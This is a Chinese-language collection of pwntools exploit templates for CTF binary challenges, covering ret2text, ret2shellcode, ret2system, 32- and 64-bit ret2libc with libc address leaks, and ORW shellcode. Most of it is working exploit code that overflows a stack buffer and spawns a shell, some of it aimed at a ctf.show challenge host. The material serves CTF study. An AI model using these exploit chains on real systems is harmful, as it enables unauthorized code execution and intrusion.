模板

ret2text

from pwn import *

# ret2text: the binary already ships a "backdoor" function, so the stack
# overflow only has to overwrite the saved return address with its address.
context(arch="i386", os="linux", log_level="debug")
filename = "./pwn"

# p = remote("pwn.challenge.ctf.show",28104)
p = process(filename)
elf = ELF(filename)
flag_addr = elf.sym['backdoor']
# 0x12 bytes from the start of the buffer to the saved ebp, plus the 4-byte
# saved ebp itself (offset taken from this challenge binary -- re-check with
# a cyclic pattern on a different build).
padding = 0x12 + 4
payload = b'a' * padding + p32(flag_addr)
p.sendline(payload)
p.interactive()

ret2shellcode

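from pwn import *

# ret2shellcode: the overflowed input is also copied into a global buffer
# (buf2) that is still rwx, so the return address is pointed back at the
# shellcode we placed there.
context(arch="i386", os="linux", log_level="debug")
# The original defined filename="./pwn" but then spawned './ret2shellcode';
# keep a single source of truth for the target path.
filename = "./ret2shellcode"

sh = process(filename)
shellcode = asm(shellcraft.sh())
# Address of the global copy of our input. Confirm with `vmmap` in gdb that
# this page is executable (no NX) before relying on it.
buf2_addr = 0x804a080

# 112 = distance from the start of the buffer to the saved return address.
# ljust() pads but never truncates, so a shellcode longer than that would
# silently clobber the return address.
if len(shellcode) > 112:
    log.error("shellcode is %d bytes, exceeds the 112-byte buffer", len(shellcode))
# asm() returns bytes, so the pad byte must be bytes too: bytes.ljust(112, 'A')
# raises TypeError on Python 3.
sh.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))
sh.interactive()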

ret2syscall

一般用于静态编译

有system,有bin/sh

有system,无bin/sh

  • 有sh

    用sh代替bin/sh

  • 用 gets 把 /bin/sh 读入一个可写的全局变量(例如 .bss 里的 buf2),再把这个变量的地址作为参数传给 system

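    from pwn import *
    # ret2system with gets(): the binary has system() but no "/bin/sh" string,
    # so we first call gets() to write "/bin/sh" into a writable global, then
    # call system() on that global.
    context(arch = 'i386',os = 'linux',log_level = 'debug')
    io = process('./pwn')
    #io = remote('pwn.challenge.ctf.show',28116)
    elf = ELF('./pwn')
    system = elf.sym['system']
    buf2 = 0x804B060    # writable global (.bss) that will receive "/bin/sh"
    gets = elf.sym['gets']
    pop_ebx = 0x8048409 # 0x08048409 : pop ebx ; ret  -- pops gets()'s argument so the chain continues
    # Chain: gets(buf2) -> `pop ebx; ret` discards the argument -> system(buf2).
    # b'aaaa' is system()'s (never used) return address.
    # Fixes vs. the original: the expression was split across two lines without
    # parentheses (SyntaxError), and the str 'aaaa' cannot be concatenated with
    # the bytes returned by p32() on Python 3 -- everything here is bytes.
    payload = flat([
        cyclic(0x6c + 4),   # 0x6c bytes of buffer plus the 4-byte saved ebp
        gets, pop_ebx, buf2,
        system, b'aaaa', buf2,
    ])
    io.sendline(payload)
    # second line is consumed by gets(buf2) inside the chain
    io.sendline(b"/bin/sh")
    io.recv()
    io.interactive()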
    

ret2libc

LibcSearcher("func", addr) 的第二个参数 addr 必须是整数(即 u32/u64 解包之后的值),不能直接传 bytes 或字符串

无system,无bin/sh

思路

  1. 通过 puts 等函数把这个函数__在 GOT 表里存放的真实地址__(即它在 libc 中的运行时地址)打印出来
  2. 用 libc.address = puts_addr - libc.sym['puts'] 算出 libc 的加载基址(基址必须以 0x000 结尾,否则说明泄露值或匹配到的 libc 版本有误),再据此算出 system 函数和字符串“/bin/sh”在 libc 中的地址
  3. 利用溢出漏洞,构造rop,获取shell

32位

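from pwn import *
from LibcSearcher import LibcSearcher

# ret2libc (32-bit): leak the libc address of puts() through its GOT entry,
# identify the remote libc with LibcSearcher, then return into system("/bin/sh").
context(arch="i386", os="linux", log_level="debug")
filename = "./pwn"

#p = remote("pwn.challenge.ctf.show",28121)
p = process(filename)
elf = ELF(filename)

padding = 0x6B + 0x4          # buffer-to-saved-ebp distance plus the saved ebp
main_addr = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

# Stage 1: puts(puts_got) prints the resolved address of puts, then return to
# main so we get a second overflow for the real chain.
payload = flat([b'a' * padding, puts_plt, main_addr, puts_got])
p.sendline(payload)
# recvuntil needs bytes; the original passed the str '\xf7', which only worked
# through pwntools' implicit latin-1 encoding (and warns). On 32-bit Linux the
# libc mapping normally sits at 0xf7xxxxxx, so the little-endian leak ends in
# 0xf7. Caveat: if the program prints a 0xf7 byte before the leak this grabs
# the wrong 4 bytes -- anchor on a known prompt/newline instead if so.
puts_addr = u32(p.recvuntil(b'\xf7')[-4:])
print(hex(puts_addr))

libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
print(hex(libc_base))
# libc is mapped page-aligned; anything else means a bad leak or a wrong libc match.
if libc_base & 0xfff:
    log.error("libc base %#x is not page aligned; leak or libc match is wrong", libc_base)
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_bin_sh")

# Stage 2: system("/bin/sh"); the 4 bytes after system_addr are its return
# address (unused), followed by the first argument.
payload = flat([b'a' * padding, system_addr, b'a' * 4, binsh_addr])
p.sendline(payload)

p.interactive()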

64位

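from pwn import *
from LibcSearcher import LibcSearcher

# ret2libc (64-bit): same idea as the 32-bit version, but the first argument
# goes in rdi (via a `pop rdi; ret` gadget) and rsp must be kept 16-byte
# aligned when entering libc functions.
context(arch="amd64", os="linux", log_level="debug")
filename = "./pwn"


#p = remote("pwn.challenge.ctf.show", 28233)
p = process(filename)
elf = ELF(filename)

# gdb.attach(p)
# pause()

padding = 0x20 + 0x8          # buffer-to-saved-rbp distance plus the saved rbp
main_addr = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_ret = 0x4007e3            # pop rdi ; ret   (gadget address from this binary)
ret_addr = 0x04004fe          # ret             (used only to realign rsp)

# Stage 1: puts(puts_got), a lone `ret` to fix stack alignment, then back to
# main for a second overflow.
payload = flat([b'a' * padding, rdi_ret, puts_got, puts_plt, ret_addr, main_addr])
p.sendline(payload)
# A userland 64-bit libc address has 6 significant bytes and ends in 0x7f.
# recvuntil needs bytes, not the str '\x7f' the original passed. Caveat: an
# earlier 0x7f byte in the program's output would make this grab the wrong
# bytes -- anchor on a known prompt/newline instead if that happens.
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

# Local: use the libc actually loaded by the process instead of LibcSearcher.
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# libc_base=puts_addr-libc.symbols['puts']
# system_addr=libc_base+libc.symbols['system']
# binsh_addr=libc_base+next(libc.search(b"/bin/sh"))

# payload=flat([b'a' * padding,rdi_ret,binsh_addr,system_addr])
# p.sendline(payload)

# Remote: identify the libc from the leaked address.
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
print(hex(libc_base))
# libc is mapped page-aligned; anything else means a bad leak or a wrong libc match.
if libc_base & 0xfff:
    log.error("libc base %#x is not page aligned; leak or libc match is wrong", libc_base)
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_bin_sh")

# Stage 2: system("/bin/sh"). If this dies with SIGSEGV inside system() (a
# movaps on a misaligned stack), insert ret_addr before system_addr.
payload = flat([b'a' * padding, rdi_ret, binsh_addr, system_addr])
p.sendline(payload)

p.interactive()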

题目给泄露出的字符串wp参考

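from pwn import *
from LibcSearcher import LibcSearcher
context(arch = 'i386',os = 'linux',log_level = 'debug')

#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28297)
elf = ELF('./pwn')

# The challenge prints the address of puts() and a "gift" pointer to "/bin/sh".
# Parse them with int(), never eval(): eval() executes whatever the remote side
# sends back, so a malicious or compromised server would get code execution on
# the attacker's machine. int(x, 0) accepts "0x..." hex as well as plain
# decimal, which covers the formats eval() was handling before.
io.recvuntil(b"puts: ")
puts = int(io.recvuntil(b"\n", drop = True), 0)
io.recvuntil(b"gift: ")
bin_sh = int(io.recvuntil(b"\n", drop = True), 0)

libc = LibcSearcher("puts" , puts)
libc_base = puts - libc.dump("puts")
system = libc_base + libc.dump("system")
# 0x9c bytes of buffer + 4-byte saved ebp, then system(), a dummy return
# address, and the "/bin/sh" pointer as its first argument.
payload = b"a"*(0x9c+4) + p32(system) + p32(0) + p32(bin_sh)
io.sendline(payload)
io.interactive()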

ORW

# ORW (open/read/write) shellcode for sandboxes that block execve:
# open("/flag"), read it into a buffer, write the buffer to stdout.
shell_code = shellcraft.open("/flag")
# fd 3 assumes only stdin/stdout/stderr are open when open() returns -- TODO
# confirm for the target; mmap_addr must be defined elsewhere as a writable
# buffer (e.g. the result of an earlier mmap).
shell_code += shellcraft.read(3,mmap_addr,0x100) 
shell_code += shellcraft.write(1,mmap_addr,0x100) 
shell_code = asm(shell_code)